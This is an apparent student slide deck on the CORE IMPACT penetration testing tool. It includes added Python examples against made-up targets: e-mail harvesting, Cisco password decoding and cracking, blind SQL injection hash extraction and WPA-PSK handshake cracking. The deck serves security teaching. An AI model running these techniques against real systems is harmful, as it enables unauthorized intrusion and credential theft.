Title: CORE IMPACT
1 CORE IMPACT
- Hamde AL Tamimi
- Mohammad Ali Qattan
- Amira Mosa AL Braim
- Rakan Tayseer
2 What is CORE IMPACT?
- CORE IMPACT is an automated penetration testing tool. It scans a range of hosts looking for vulnerabilities for which it has working exploits.
- These exploits can then be launched against the vulnerable hosts to attempt to gain access.
- Having gained access to a vulnerable host, CORE IMPACT can install Agents which provide varying levels of remote access (including directory listing, uploading and downloading files, and so on).
- It is even possible to use a compromised host to launch new penetration tests against other hosts on the network which may not have been visible from the initial scan.
- In this way the penetration tester can move from host to host within the compromised network (pivoting).
3 Cont.
- CORE IMPACT thus allows the user to safely exploit vulnerabilities in the network, replicating the kinds of access an intruder could achieve and proving actual attack paths that must be eliminated.
- The product features the Rapid Penetration Test (RPT), a step-by-step automation of the penetration testing process. From the initial information gathering phase to production of the final report, the penetration testing steps within CORE IMPACT can be run completely autonomously. The steps in this process are:
- Information Gathering
- Attack and Penetration
- Local Information Gathering
- Privilege Escalation
- Clean Up
- Report Generation
4 Cont.
- Each of the six processes listed previously is available as a Wizard in the Rapid Penetration Test window.
- By following each of them in turn, the average user will follow the typical attacker methodology recommended by every generic hacking handbook, and be able to complete a very comprehensive penetration test without recourse to experts or outside consultants. (The wizards automate the steps, not the scoping: exploits are only safe to run against systems you are authorized to test, and an exploit can still leave a target service unavailable.)
- Of course, experts and consultants will also find this tool incredibly useful in their day-to-day work.
5 Information Gathering
- CORE IMPACT offers several types of test, each with its own way of gathering information:
- Client-Side Rapid Penetration Testing
- Mobile Device Rapid Penetration Testing
- Network Device Rapid Penetration Testing
- Network Rapid Penetration Testing
- Web Application Rapid Penetration Testing
- Wireless Rapid Penetration Testing
6 Client-Side Rapid Penetration Testing
- In the case of end-user testing, Information Gathering involves the collection of email addresses to target with phishing, spear phishing or other social engineering attacks. (Instead of casting out thousands of e-mails at random and hoping a few victims will bite, spear phishers target select groups of people with something in common: they work at the same company, bank at the same financial institution, and so on.) CORE IMPACT offers a number of modules for gathering email addresses of individuals in your organization, or you can enter or import your own list of email addresses to test.
- Key Capabilities
- Crawl a website to harvest addresses published on the site
- Use search engines to locate addresses for a given domain
- Find addresses in Pretty Good Privacy (PGP) key servers and Whois databases (PGP is a widely used program for encrypting and signing e-mail; public key servers index keys by the owner's e-mail address)
- Scan a domain for documents and scrape useful information from them, such as email addresses
7 Mobile Device Rapid Penetration Testing
- To specify mobile devices to test, you simply enter target device information (such as owner name, email address and phone number) into the CORE IMPACT interface.
8 Network Device Rapid Penetration Testing
- If CORE IMPACT identifies the operating system of a target and confirms it to be a network device, it will attempt to collect information about the device. Alternately, CORE IMPACT includes a passive Cisco Discovery Protocol (CDP) network discovery module that listens for the periodic CDP announcements sent by Cisco devices.
- Key Capabilities
- Fingerprint found devices to determine manufacturer, device model/type, and operating system details
- Determine the services on which the device accepts connections or instructions, including Simple Network Management Protocol (SNMP), Telnet, HTTP, etc.
9 Network Rapid Penetration Testing
- The Information Gathering step collects data about the targeted network, typically using the Network Discovery, Port Scanner, and OS and Service Identification modules. Alternately, you can complete this step by importing information from your network mapping tool or vulnerability scanner.
- Key Capabilities
- Identify the operating system and services running on targeted machines
- Control the IP ranges you want to scan
- Select from a variety of network discovery and port scanning methods, including TCP Connect, TCP SYN (half-open) and Internet Control Message Protocol (ICMP) scans
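- Added example (not part of the original slides and not CORE IMPACT's own code): a TCP Connect scan with banner grabbing, the simplest of the port scanning methods listed above. It completes the full three-way handshake, so it needs no raw sockets (unlike a SYN scan) but is visible to the target as an established connection. The target is a constructed loopback listener that stands in for a real host; the banner string, host and ports are assumptions made for the example.

```python
import socket
import threading
from concurrent.futures import ThreadPoolExecutor


def start_fake_service(banner=b"SSH-2.0-OpenSSH_9.6\r\n"):
    """Constructed stand-in for a real host's service: a loopback listener that greets with a banner.
    Returns (port, stop) where stop() shuts the listener down."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))          # port 0: let the OS pick a free port
    srv.listen(16)
    srv.settimeout(0.2)
    stopped = threading.Event()

    def serve():
        while not stopped.is_set():
            try:
                conn, _ = srv.accept()
            except socket.timeout:
                continue
            with conn:
                conn.sendall(banner)
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1], stopped.set


def closed_port():
    """Bind-and-release a port so the example has a port that is known to be closed."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


def probe(host, port, timeout=0.5):
    """TCP connect scan of one port. Returns (port, state, banner)."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        try:
            s.connect((host, port))
        except ConnectionRefusedError:
            return port, "closed", b""       # RST came back: nothing is listening
        except (socket.timeout, OSError):
            return port, "filtered", b""     # no answer at all: dropped by a firewall, or host down
        try:
            banner = s.recv(128)             # many services speak first (SSH, SMTP, FTP)
        except (socket.timeout, OSError):
            banner = b""
    return port, "open", banner


def scan(host, ports, workers=32):
    """Scan many ports concurrently; returns a sorted list of (port, state, banner)."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        return sorted(pool.map(lambda p: probe(host, p), ports))


def identify(banner):
    """First cut at service identification from the banner alone."""
    text = banner.strip().decode("ascii", errors="replace")
    if text.startswith("SSH-"):
        return "ssh " + text.split("-", 2)[2]
    if text.startswith("220 "):
        return "smtp/ftp " + text[4:]
    if text.startswith("HTTP/"):
        return "http"
    return "unknown" if text else "no banner (client speaks first, e.g. HTTP)"


if __name__ == "__main__":
    port, stop = start_fake_service()
    for p, state, banner in scan("127.0.0.1", [port, closed_port()]):
        print(p, state, identify(banner))
    stop()
```

The three states mirror what a scanner reports: a refused connection proves a host is up but the port is closed, while a silent timeout cannot distinguish a firewall from a dead host, which is why "filtered" results usually need a second probe method (ICMP, or a SYN scan that watches for RST versus silence).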
10 Web Application Rapid Penetration Testing
- During this phase of the Web Application Rapid Penetration Test, CORE IMPACT crawls through web pages and identifies pages to test. Alternately, you can import the results from popular web application vulnerability scanners and validate the imported findings for exploitability.
- Key Capabilities
- Specify a domain or range of web pages to crawl
- Set a link depth limit for the crawler
- Select whether to follow links outside the specified site
- Crawl JavaScript to discover and assess dynamically generated pages
- Establish the browser type and version to use
- Supply any login information required to emulate an attack from someone with access rights to the web application
- Import web scanner results for vulnerability validation
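- Added example (not part of the original slides and not CORE IMPACT's own code) covering both the web crawler controls listed above and the address harvesting from slide 6: a breadth-first crawler with a link-depth limit, an in-scope / follow-external switch and optional extraction of paths from JavaScript, which harvests e-mail addresses (plain, mailto:, entity-wrapped and "(at)"-obfuscated) from every page it fetches. The site it crawls is a constructed in-memory map of URL to HTML so the code runs offline; every URL and address in it is made up for the example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Constructed in-memory "site" standing in for HTTP fetches, so the example runs offline.
# Keys are absolute URLs, values are the HTML bodies a real crawler would download.
SITE = {
    "https://example.test/": ('<a href="/about">About</a> <a href="/docs/a">Docs</a> '
                              '<a href="https://other.test/">Partner</a> contact: info@example.test'),
    "https://example.test/about": '<a href="/team">Team</a> press: press (at) example.test',
    "https://example.test/team": ('Alice &lt;alice@example.test&gt;, '
                                  'Bob <a href="mailto:bob@example.test">mail</a>'),
    "https://example.test/docs/a": '<a href="/docs/b">next</a><script>var page = "/hidden/js-only";</script>',
    "https://example.test/docs/b": 'deep page, support@example.test',
    "https://example.test/hidden/js-only": 'ops@example.test',
    "https://other.test/": 'external@other.test',
}

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
# Common anti-harvesting spelling such as "press (at) example.test".
OBFUSCATED_RE = re.compile(
    r"([A-Za-z0-9._%+-]+)\s*[\(\[]\s*at\s*[\)\]]\s*([A-Za-z0-9.-]+\.[A-Za-z]{2,})", re.I)
JS_PATH_RE = re.compile(r'"(/[^"\s]+)"')  # quoted absolute paths inside <script> blocks


class PageParser(HTMLParser):
    """Collects <a href> targets and the raw text of <script> blocks."""

    def __init__(self, base):
        super().__init__()
        self.base, self.links, self.scripts, self._in_script = base, [], [], False

    def handle_starttag(self, tag, attrs):
        href = dict(attrs).get("href")
        if tag == "a" and href:
            self.links.append(urljoin(self.base, href))
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)


def fetch(url):
    """Stand-in for an HTTP GET; returns None for pages that do not exist."""
    return SITE.get(url)


def harvest_emails(html, domain=None):
    """Extract plain, mailto:, entity-wrapped and '(at)'-obfuscated addresses from raw HTML."""
    found = set(EMAIL_RE.findall(html))
    found |= {f"{user}@{host}" for user, host in OBFUSCATED_RE.findall(html)}
    if domain:
        found = {e for e in found if e.lower().endswith("@" + domain.lower())}
    return found


def crawl(start, max_depth=2, follow_external=False, crawl_js=False, domain=None):
    """Breadth-first crawl with a link-depth limit and scope control.

    Returns (visited_urls, emails), both sorted. Links are only followed from pages shallower
    than max_depth; other hosts are skipped unless follow_external is set; paths found inside
    JavaScript are queued only when crawl_js is set.
    """
    scope = urlparse(start).netloc
    queue, seen, visited, emails = [(start, 0)], {start}, [], set()
    while queue:
        url, depth = queue.pop(0)
        body = fetch(url)
        if body is None:
            continue
        visited.append(url)
        emails |= harvest_emails(body, domain)
        if depth >= max_depth:
            continue
        parser = PageParser(url)
        parser.feed(body)
        links = list(parser.links)
        if crawl_js:
            links += [urljoin(url, p) for s in parser.scripts for p in JS_PATH_RE.findall(s)]
        for link in links:
            if link.startswith("mailto:"):
                continue
            if not follow_external and urlparse(link).netloc != scope:
                continue
            if link not in seen:
                seen.add(link)
                queue.append((link, depth + 1))
    return sorted(visited), sorted(emails)


if __name__ == "__main__":
    print(crawl("https://example.test/", max_depth=2, domain="example.test"))
    print(crawl("https://example.test/", max_depth=2, crawl_js=True, follow_external=True))
```

Run with the defaults it stays on example.test and never sees the page that is only referenced from JavaScript; switch on crawl_js and follow_external and both the JS-only page and the partner site (with its out-of-scope address) appear, which is exactly the trade-off the depth and scope controls let a tester make.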
11 Wireless Rapid Penetration Testing
- CORE IMPACT's discovery capabilities allow users to identify both authorized networks and unauthorized (rogue) access points. It then profiles any networks discovered by analyzing signal and packet data to measure signal strength, determine the security protocols in use, and identify devices interacting with each network.
- Key Capabilities
- Discover both known and unknown Wi-Fi networks and access points
- Gather MAC addresses and service set identifiers (SSIDs) from beaconing devices (an SSID is the name of a wireless local area network (WLAN); all wireless devices on a WLAN must use the same SSID in order to communicate with each other)
- Impersonate access points, and fingerprint / harvest information from systems that connect
- Gather information on signal strength, security protocols and connected devices
- Scan traffic for streams of sensitive data
12 Attack and Penetration
- The same test categories as before apply here:
- Client-Side Rapid Penetration Testing
- Mobile Device Rapid Penetration Testing
- Network Device Rapid Penetration Testing
- Network Rapid Penetration Testing
- Web Application Rapid Penetration Testing
- Wireless Rapid Penetration Testing
13 Client-Side Rapid Penetration Testing
- In this test, you create an email, associate it with an exploit, and go phishing. The product includes sample email templates that simulate common phishing attacks. You can also create your own custom spear phishing emails that exploit inside knowledge of your organization.
- CORE IMPACT's large library of client-side exploits includes attacks that target endpoint applications, endpoint security solutions, and endpoint operating systems and services. The product also takes care of sending the email, giving you options such as selecting a Simple Mail Transfer Protocol (SMTP) server or spoofing a specific From address.
- Key Capabilities
- Create phishing, spear phishing and spam emails from a variety of pre-built templates
- Safely deploy Agents using real-world malware attack techniques to test end-user system security (malware, short for malicious software, is software designed to disrupt computer operation, gather sensitive information, or gain unauthorized access to computer systems)
- Track who responds to attacks and measure the effectiveness of security awareness programs, with or without exploiting their systems
- Assess data leakage risks by luring users to complete impostor web forms
- Prove the consequences of an end-user security breach by interacting with compromised workstations
14 Mobile Device Rapid Penetration Testing
- CORE IMPACT uses real-world attack techniques including phishing, web form impersonation, fake wireless access points, and wireless man-in-the-middle attacks to assess end users and their devices. (A man-in-the-middle attack is a form of active eavesdropping in which the attacker makes independent connections with the victims and relays messages between them, making them believe that they are talking directly to each other over a private connection, when in fact the entire conversation is controlled by the attacker. The attacker must be able to intercept all messages going between the two victims and inject new ones.)
- Key Capabilities
- Phishing: send emails and texts that determine whether employees would fall prey to phishing and spear phishing attacks by clicking through to malicious sites and/or installing untrusted mobile apps
- Web Form Impersonation: assess data leakage threats by sending phishing tests that link to web forms designed to capture and record user-entered data
- Fake Wireless Access Points: impersonate valid wireless access points and gather profile information about the connected devices, launching attacks when the device or user requests data through the fake access point
- Wireless Man-in-the-Middle: identify and monitor wireless networks that have either no encryption or WEP-based encryption, observe any connected devices, intercept transmissions and insert attacks that target the connected devices
15 Network Device Rapid Penetration Testing
- CORE IMPACT uses dictionary attacks to guess passwords and gain access to network devices. (A dictionary attack defeats an authentication mechanism by trying, one after another, every candidate password in a pre-arranged list, the dictionary, typically built from common passwords, vendor defaults and words related to the target.) Once the device is compromised, CORE IMPACT offers various modules to demonstrate the ramifications of the breach.
- Key Capabilities
- Launch dictionary attacks to gain device access
- Retrieve the configuration file of a compromised device and try to crack the passwords stored in it
- Rename compromised devices
- Demonstrate how attackers could intercept copies of data packets via interface monitoring
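- Added example (not part of the original slides and not CORE IMPACT's own code) for the "retrieve the configuration file and crack the passwords in it" step: it parses the credential lines of a Cisco IOS running-config, reverses "type 7" passwords outright (they are XOR obfuscation against a fixed, public key, not encryption) and runs a dictionary attack against "type 5" secrets, which are salted md5crypt hashes and can only be guessed. The config excerpt, hostnames, passwords and wordlist are constructed for the example; the type 5 hashes in it are generated by the block's own md5crypt so that it is self-contained.

```python
import hashlib
import re

# Cisco "type 7" is reversible obfuscation: each byte is XORed with a fixed key, starting at an
# offset given by the first two digits. The key is the one published in the public decoders.
TYPE7_KEY = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"
ITOA64 = b"./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def type7_decode(blob):
    seed, data = int(blob[:2]), bytes.fromhex(blob[2:])
    return "".join(chr(b ^ TYPE7_KEY[(seed + i) % len(TYPE7_KEY)]) for i, b in enumerate(data))


def type7_encode(plain, seed=8):
    return f"{seed:02d}" + "".join(f"{ord(c) ^ TYPE7_KEY[(seed + i) % len(TYPE7_KEY)]:02X}"
                                  for i, c in enumerate(plain))


def _to64(value, count):
    return bytes(ITOA64[(value >> (6 * k)) & 0x3F] for k in range(count))


def md5crypt(password, salt, magic=b"$1$"):
    """FreeBSD md5crypt, the algorithm behind Cisco 'secret 5'. Salted and stretched over 1000
    rounds, so unlike type 7 it has to be attacked by guessing."""
    salt = salt[:8]
    ctx = hashlib.md5(password + magic + salt)
    alt = hashlib.md5(password + salt + password).digest()
    for n in range(len(password), 0, -16):
        ctx.update(alt[:min(16, n)])
    n = len(password)
    while n:
        ctx.update(b"\0" if n & 1 else password[:1])
        n >>= 1
    final = ctx.digest()
    for i in range(1000):
        ctx = hashlib.md5(password if i & 1 else final)
        if i % 3:
            ctx.update(salt)
        if i % 7:
            ctx.update(password)
        ctx.update(final if i & 1 else password)
        final = ctx.digest()
    out = b"".join(_to64((final[a] << 16) | (final[b] << 8) | final[c], 4)
                   for a, b, c in ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)))
    return (magic + salt + b"$" + out + _to64(final[11], 2)).decode()


def crack_type5(hashed, wordlist):
    """Dictionary attack: rehash each candidate with the stored salt and compare."""
    magic, salt, _ = hashed[1:].split("$")
    for word in wordlist:
        if md5crypt(word.encode(), salt.encode(), f"${magic}$".encode()) == hashed:
            return word
    return None


CRED_RE = re.compile(r"^\s*(?:username (\S+)\s+|(enable)\s+)?(?:password|secret)\s+([57])\s+(\S+)\s*$")


def extract_credentials(config):
    """Return (where, type, value) for every type 5/7 credential in an IOS config, tracking the
    'line ...' section that a bare 'password' line belongs to."""
    creds, context = [], "global"
    for line in config.splitlines():
        if line.startswith("line "):
            context = line.strip()
        elif not line.startswith(" "):
            context = "global"
        m = CRED_RE.match(line)
        if m:
            user, enable, kind, value = m.groups()
            creds.append((user or enable or context, kind, value))
    return creds


def audit(config, wordlist):
    """Recover whatever type 7 decoding and a dictionary attack on type 5 can reach."""
    results = {}
    for where, kind, value in extract_credentials(config):
        if kind == "7":
            results[where] = ("type7-decoded", type7_decode(value))
        else:
            word = crack_type5(value, wordlist)
            results[where] = ("type5-cracked", word) if word else ("type5-uncracked", None)
    return results


# Constructed excerpt of a running-config, as it would be retrieved from a compromised device.
# The type 5 hashes are generated here from chosen passwords so the example is self-contained.
CONFIG = """\
hostname edge-rtr-1
enable secret 5 {enable}
username admin password 7 0822455D0A16
username backup secret 5 {backup}
line vty 0 4
 password 7 0235015819551B60
 login
""".format(enable=md5crypt(b"Cisco123", b"mERr"), backup=md5crypt(b"Tr0ub4dor&3", b"k5Qz"))

WORDLIST = ["password", "cisco", "admin", "Cisco123", "letmein"]   # constructed, deliberately tiny

if __name__ == "__main__":
    for where, (how, secret) in audit(CONFIG, WORDLIST).items():
        print(f"{where:14} {how:16} {secret}")
```

The output shows the practical difference between the two storage types: every type 7 password falls immediately, the enable secret falls because it is in the wordlist, and the one strong type 5 secret survives. That is also the remediation message for the report: replace "password 7" with "secret" (type 5 or, on current IOS, the stronger scrypt-based type 9) and treat any retrieved config as a credential leak.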
16 Network Rapid Penetration Testing
- During Attack and Penetration, CORE IMPACT automatically selects and launches remote attacks based on the IP, OS, architecture, port and service information obtained in the Information Gathering step. You can choose to launch every potential attack against each target computer, or you can have the system stop once it successfully deploys a single Network Agent, which carries the attack payload. You maintain full control over which computers are attacked and the order in which exploits are launched. In addition, you can further simplify and speed up tests by excluding exploits that may leave a target service unavailable or take a long time to run.
- Key Capabilities
- Launch multiple attacks in parallel to speed up the penetration testing process
- Interact with compromised machines via discreet Agents that are installed only in system memory (nothing is written to disk)
- Run local exploits to attack machines internally, rather than from across the network
- Maintain control over which exploits are applied
17 Web Application Rapid Penetration Testing
- CORE IMPACT enables you to test web applications for Persistent Cross-Site Scripting (XSS), Reflected XSS (both in static HTML and in Adobe Flash objects), Remote File Inclusion in PHP applications, SQL Injection, and Blind SQL Injection. (Cross-site scripting is the injection of attacker-controlled script into a page that other users' browsers then execute; a persistent XSS payload is stored by the application, while a reflected one is echoed straight back from the request.) CORE IMPACT then dynamically creates exploits to prove whether the vulnerability poses an actual threat. If an exploit is successful, CORE IMPACT establishes an Agent that allows you to take a number of actions to reveal at-risk information assets.
- Key Capabilities
- Analyze custom, customized and out-of-the-box web applications for security weaknesses
- Validate security exposures using dynamically generated exploits, emulating a hacker trying various attack paths and methods
- Guess application usernames and passwords with dictionary attacks
- Evade Web Application Firewalls (WAFs) with built-in evasion capabilities
- Demonstrate the consequences of an attack by interacting with web server file systems and databases through command shells and database consoles
- Perform penetration tests without corrupting web applications or running code on targeted servers
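- Added example (not part of the original slides and not CORE IMPACT's own code) of what "validating for exploitability" means for two of the flaw classes above: a constructed search page with reflected XSS and string-built SQL sits next to its hardened version, and a validator proves the reflected XSS with a marker probe, proves blind SQL injection with a true/false boolean oracle, and then extracts a stored password hash character by character using nothing but SELECT conditions (so the application's data is never modified, matching the last capability). The application, its SQLite tables and the stored hash are all made up for the example; the injection suffixes are tailored to this page's LIKE '%...%' context, which a tester would adjust per injection point.

```python
import html
import sqlite3

# Constructed target: both app versions serve /search?q=... over the same in-memory SQLite database.
DB = sqlite3.connect(":memory:", check_same_thread=False)
DB.executescript("""
CREATE TABLE products(id INTEGER PRIMARY KEY, name TEXT, price REAL);
INSERT INTO products(name, price) VALUES ('widget', 9.99), ('gadget', 19.99), ('gizmo', 4.5);
CREATE TABLE users(id INTEGER PRIMARY KEY, login TEXT, pw_hash TEXT);
INSERT INTO users(login, pw_hash) VALUES ('admin', '5f4dcc3b5aa765d61d8327deb882cf99');
""")


def vulnerable_app(path, params):
    """String-built SQL (SQL injection) and the search term echoed unescaped (reflected XSS)."""
    q = params.get("q", "")
    if path != "/search":
        return 404, "<h1>Not found</h1>"
    try:
        rows = DB.execute(f"SELECT name, price FROM products WHERE name LIKE '%{q}%'").fetchall()
    except sqlite3.Error as exc:
        return 500, f"<h1>Database error</h1><pre>{html.escape(str(exc))}</pre>"
    items = "".join(f"<li>{n}: {p}</li>" for n, p in rows)
    return 200, f"<h1>Results for {q}</h1><ul>{items}</ul>"


def hardened_app(path, params):
    """Same page with a parameterised query and output encoding."""
    q = params.get("q", "")
    if path != "/search":
        return 404, "<h1>Not found</h1>"
    rows = DB.execute("SELECT name, price FROM products WHERE name LIKE ?", (f"%{q}%",)).fetchall()
    items = "".join(f"<li>{html.escape(n)}: {p}</li>" for n, p in rows)
    return 200, f"<h1>Results for {html.escape(q)}</h1><ul>{items}</ul>"


# --- validation: prove the finding is exploitable instead of just reporting a pattern match ---

XSS_PROBE = "<xssprobe1337>"   # arbitrary marker: if it comes back with its brackets intact, script would run too


def check_reflected_xss(app, path="/search", param="q"):
    _, body = app(path, {param: XSS_PROBE})
    return XSS_PROBE in body


def _oracle(app, path, param, cond):
    """True if the page for an injected condition is identical to the baseline page once the injected
    text itself is removed. The injection point sits inside LIKE '%...%': the original query's trailing
    %' closes our last literal, so '%'='%' is the always-true tail."""
    _, baseline = app(path, {param: ""})
    payload = f"' AND ({cond}) AND '%'='"
    _, page = app(path, {param: payload})
    return page.replace(payload, "") == baseline


def check_blind_sqli(app, path="/search", param="q"):
    """Boolean-based blind test: a true condition must match the baseline, a false one must not."""
    return _oracle(app, path, param, "1=1") and not _oracle(app, path, param, "1=2")


def blind_extract(app, subquery, path="/search", param="q", max_len=64):
    """Pull a scalar out of the database one character at a time, read-only."""
    out = ""
    for pos in range(1, max_len + 1):
        if not _oracle(app, path, param, f"LENGTH(({subquery})) >= {pos}"):
            break
        lo, hi = 32, 126   # binary search over printable ASCII: 7 requests per character
        while lo < hi:
            mid = (lo + hi) // 2
            if _oracle(app, path, param, f"UNICODE(SUBSTR(({subquery}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


def assess(app):
    report = {"reflected_xss": check_reflected_xss(app), "blind_sqli": check_blind_sqli(app), "extracted": None}
    if report["blind_sqli"]:
        report["extracted"] = blind_extract(app, "SELECT pw_hash FROM users WHERE login = 'admin'")
    return report


if __name__ == "__main__":
    print("vulnerable:", assess(vulnerable_app))
    print("hardened:  ", assess(hardened_app))
```

Against the vulnerable version the validator returns both findings plus the admin hash it pulled out; against the hardened version every check is negative, because the parameterised query turns the payload into a literal search string and html.escape turns the probe's angle brackets into entities. Note that the same single-quote payload that drives the oracle also makes the vulnerable page return a 500 with the database error text, which is the cheaper error-based signal a scanner looks for first.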
19 Wireless Rapid Penetration Testing
- CORE IMPACT recovers keys by taking advantage of known weaknesses in WEP-secured networks (Wired Equivalent Privacy (WEP) is the original, now broken, security algorithm for IEEE 802.11 wireless networks). The solution also assesses networks secured by WPA and WPA2 (Wi-Fi Protected Access and Wi-Fi Protected Access II, the security protocols and certification programs that replaced WEP) when they use a Pre-Shared Key, via dictionary attacks that leverage information from sniffed authentication attempts (the four-way handshake). Finally, CORE IMPACT enables you to intercept wireless transmissions and conduct Man-in-the-Middle attacks.
- Key Capabilities
- Replicate attacks against WEP, WPA and WPA2-encrypted networks
- Perform Man-in-the-Middle attacks, intercept wireless transmissions, and insert exploits into relayed traffic
- Impersonate access points to connect with beaconing systems and test them against remote exploits
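- Added example (not part of the original slides and not CORE IMPACT's own code) of the WPA/WPA2-PSK dictionary attack described above, carried through the real key derivation: PBKDF2-HMAC-SHA1 over the passphrase and SSID gives the PMK, the PRF-512 over the two MAC addresses and nonces from the sniffed handshake gives the PTK, and the first 16 bytes of the PTK (the KCK) must reproduce the MIC on handshake message 2. Everything except the passphrase is in the capture, so the attack runs offline and its cost is 4096 HMAC rounds per guess. The "capture" here is constructed in code (SSID, MACs, nonces and passphrase are all made up), and its MIC is computed by the block itself so the example is self-contained; the one real-world check is the IEEE 802.11 PSK test vector for passphrase "password" on SSID "IEEE". WPA3's SAE exchange removes this offline attack, which is why the attack is listed for WPA and WPA2 only.

```python
import hashlib
import hmac


def pmk_from_passphrase(passphrase, ssid):
    """PSK/PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 rounds, 32 bytes). The expensive step, and the
    only one that depends on the guess; everything else is cheap and comes from the capture."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk, aa, spa, anonce, snonce):
    """PRF-512 from IEEE 802.11: PTK = PRF(PMK, "Pairwise key expansion", min/max of MACs and nonces)."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    blocks = [hmac.new(pmk, b"Pairwise key expansion\0" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4)]
    return b"".join(blocks)[:64]          # KCK = bytes 0..15, KEK = 16..31, TK = 32..47


MIC_OFFSET = 4 + 1 + 2 + 2 + 8 + 32 + 16 + 8 + 8   # EAPOL header + key-descriptor fields before the MIC = 81


def eapol_mic(kck, eapol_frame, key_version):
    """MIC over the whole EAPOL-Key frame with its 16-byte MIC field zeroed. Key descriptor version 1
    (TKIP) uses HMAC-MD5, version 2 (CCMP) HMAC-SHA1 truncated to 128 bits."""
    zeroed = eapol_frame[:MIC_OFFSET] + b"\0" * 16 + eapol_frame[MIC_OFFSET + 16:]
    algo = hashlib.md5 if key_version == 1 else hashlib.sha1
    return hmac.new(kck, zeroed, algo).digest()[:16]


def build_msg2(snonce, key_info=0x010A, replay_counter=1):
    """Constructed EAPOL-Key message 2 (station -> AP) with the MIC field zeroed, laid out per 802.11.
    key_info 0x010A: descriptor version 2, pairwise key, MIC present."""
    body = (b"\x02" + key_info.to_bytes(2, "big") + (16).to_bytes(2, "big")
            + replay_counter.to_bytes(8, "big") + snonce + b"\0" * 16 + b"\0" * 8 + b"\0" * 8
            + b"\0" * 16 + (0).to_bytes(2, "big"))
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body


def crack_psk(ssid, aa, spa, anonce, snonce, msg2, mic, wordlist):
    """Offline dictionary attack: the passphrase whose derived KCK reproduces the captured MIC."""
    key_version = int.from_bytes(msg2[5:7], "big") & 0x7
    for candidate in wordlist:
        kck = ptk_from_pmk(pmk_from_passphrase(candidate, ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, msg2, key_version), mic):
            return candidate
    return None


# Constructed "capture": what a sniffer would have recorded from a client joining the network.
_TRUE_PASSPHRASE = "Summer2013!"           # only used to build the fixture; the attack never reads it
CAPTURE = {
    "ssid": "CorpWiFi",
    "aa": bytes.fromhex("00c0ca3e5bde"),       # AP (authenticator) MAC
    "spa": bytes.fromhex("f0b479a11c22"),      # client (supplicant) MAC
    "anonce": bytes(range(32)),
    "snonce": bytes(range(100, 132)),
}
CAPTURE["msg2"] = build_msg2(CAPTURE["snonce"])
CAPTURE["mic"] = eapol_mic(
    ptk_from_pmk(pmk_from_passphrase(_TRUE_PASSPHRASE, CAPTURE["ssid"]),
                 CAPTURE["aa"], CAPTURE["spa"], CAPTURE["anonce"], CAPTURE["snonce"])[:16],
    CAPTURE["msg2"], 2)

if __name__ == "__main__":
    print(crack_psk(**CAPTURE, wordlist=["password", "letmein", "Summer2013!", "admin"]))
```

Two things the code makes visible that the slide does not: the SSID is the PBKDF2 salt, so rainbow tables only work per SSID (which is why default SSIDs are a finding of their own), and only messages 2 (or 3) of the handshake are needed, since they carry both the nonces and a MIC to test against.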
20 Local Information Gathering
- The Local Information Gathering step collects information about computers that have CORE IMPACT Agents deployed on them. During this step, you leverage Network Agents to interact with compromised computers and gather previously unavailable information about the OS, privileges, users and installed applications. CORE IMPACT can collect information from all deployed Agents or only from those that you specify.
- Key Capabilities
- Browse file structures and view file contents on compromised machines
- View the rights obtained on compromised machines
- Interact with compromised machines via command shells
- Demonstrate the consequences of security breaches by replicating the steps an attacker would take after gaining access to a system
- Extract data from compromised mobile devices, including call, SMS and MMS logs, GPS location and contact information
21 Privilege Escalation
- During the Privilege Escalation step, CORE IMPACT attempts to penetrate deeper into a compromised computer by running local exploits in an attempt to obtain administrative privileges. After Privilege Escalation, you can shift the source Agent to one of the newly compromised systems and cycle back to the initial Information Gathering step, thereby establishing a beachhead from which to run attacks deeper into the network.
- Key Capabilities
- Run local exploits to attack systems internally, rather than from across the network
- Gain administrative privileges on compromised systems
- View the networks to which a compromised computer is connected
- Launch attacks from any compromised system against other computers on the same network, gaining access to systems with increasing levels of security
22 Cleanup
- The Cleanup step automatically uninstalls every connected Agent. Agents are uninstalled in post order to support complex Agent chains: an Agent that was deployed through another Agent is removed before the Agent that relays its traffic, so no Agent is left orphaned on a host that can no longer be reached. In addition, all Agents are automatically uninstalled when closing the active workspace, regardless of whether the Cleanup step is executed or not.
- Key Capabilities
- Quickly and easily remove all Agents from compromised mach stayed, leaving your network and end-user systems in their original states
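- Added example (not part of the original slides and not CORE IMPACT's own code) of why the post-order matters: a constructed model of an Agent chain in which an uninstall command can only reach an Agent while every relay between the console and that Agent is still alive. Post-order removes descendants first and empties the whole chain; the naive parent-first order kills the relay and strands everything behind it, which is exactly the leftover a cleanup step exists to prevent. Host names and the chain layout are made up for the example.

```python
from dataclasses import dataclass, field


@dataclass
class Agent:
    """Constructed model of a deployed Agent: its host and the Agents whose traffic it relays."""
    host: str
    children: list = field(default_factory=list)
    alive: bool = True


def deliver_uninstall(path):
    """Send 'uninstall' to path[-1] through the relays path[:-1]. Every relay must still be alive;
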